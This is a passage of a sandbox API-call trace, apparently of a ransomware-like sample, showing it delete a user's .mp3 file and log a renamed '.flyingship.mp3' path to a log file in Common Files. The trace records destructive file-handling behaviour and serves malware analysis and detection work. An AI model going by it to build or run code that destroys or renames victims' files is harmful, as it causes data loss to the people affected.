(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0188.247] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0188.247] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0188.247] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0188.247] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0188.247] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0188.247] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0188.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0188.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0188.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x9bd9d8 [0188.248] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x9bd9d8, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0188.248] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.248] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0188.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0188.248] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0188.249] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0188.249] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0188.249] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0188.249] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0188.249] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba270 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0188.249] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0188.249] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0188.250] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0188.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0188.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0188.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0188.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd600 [0188.250] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd600, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0188.250] FreeLibrary (hLibModule=0x75990000) returned 1 [0188.250] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0188.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0188.250] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0188.250] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0188.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0188.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0188.254] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0188.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0188.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0188.254] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0188.254] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3", nBufferLength=0x7fff, lpBuffer=0x86efc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3", lpFilePart=0x0) returned 0x35 [0188.254] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3", lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93ad500, ftCreationTime.dwHighDateTime=0x1d5e750, ftLastAccessTime.dwLowDateTime=0xa9281650, ftLastAccessTime.dwHighDateTime=0x1d5da16, ftLastWriteTime.dwLowDateTime=0x156dc420, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x14415, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="RPbhRyzIp5Cjl.mp3", cAlternateFileName="RPBHRY~1.MP3")) returned 0x90af58 [0188.254] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\rpbhryzip5cjl.mp3")) returned 1 [0188.256] FindNextFileW (in: hFindFile=0x90af58, lpFindFileData=0x87f010 | out: lpFindFileData=0x87f010*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf93ad500, ftCreationTime.dwHighDateTime=0x1d5e750, ftLastAccessTime.dwLowDateTime=0xa9281650, ftLastAccessTime.dwHighDateTime=0x1d5da16, ftLastWriteTime.dwLowDateTime=0x156dc420, ftLastWriteTime.dwHighDateTime=0x1d661be, nFileSizeHigh=0x0, nFileSizeLow=0x14415, dwReserved0=0x89fe58, dwReserved1=0x773d1ecd, cFileName="RPbhRyzIp5Cjl.mp3", cAlternateFileName="RPBHRY~1.MP3")) returned 0 [0188.256] FindClose (in: hFindFile=0x90af58 | out: hFindFile=0x90af58) returned 1 [0188.259] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0188.260] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0188.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0188.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0188.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0188.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0188.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0188.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0188.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0188.260] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0188.261] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0188.261] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0188.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0188.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0188.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0188.261] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp3", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0188.261] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0188.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.261] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0188.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0188.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.261] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0188.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0188.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0188.261] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0188.262] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0188.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0188.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0188.262] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0188.262] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.262] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0188.262] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.262] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0188.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0188.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0188.262] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.262] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0188.262] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0188.263] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x29dd, lpOverlapped=0x0) returned 1 [0188.263] ReadFile (in: hFile=0x158, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0188.263] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x29dd, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0188.263] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0188.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0188.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0188.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0188.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.flyingship.mp3\r\n", cchWideChar=67, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 67 [0188.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x43) returned 0x9aa548 [0188.263] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.flyingship.mp3\r\n", cchWideChar=67, lpMultiByteStr=0x9aa548, cbMultiByte=67, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RPbhRyzIp5Cjl.flyingship.mp3\r\n", lpUsedDefaultChar=0x0) returned 67 [0188.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0188.263] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x50) returned 0x923a78 [0188.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa548 | out: hHeap=0x8a0000) returned 1 [0188.263] WriteFile (in: hFile=0x158, lpBuffer=0x923a78*, nNumberOfBytesToWrite=0x42, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x923a78*, lpNumberOfBytesWritten=0x87f43c*=0x42, lpOverlapped=0x0) returned 1 [0188.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x923a78 | out: hHeap=0x8a0000) returned 1 [0188.263] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0188.263] CloseHandle (hObject=0x158) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90af58 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x907778 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0188.265] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0188.265] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x906f38 | out: hHeap=0x8a0000) returned 1 [0188.265] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba1c8 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0188.266] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0188.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0188.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0188.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de650 | out: hHeap=0x8a0000) returned 1 [0188.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0188.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0188.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de308 | out: hHeap=0x8a0000) returned 1 [0188.267] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.267] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0188.267] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.267] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0188.267] RtlAllocateHeap (HeapHandle=0x8a0000, 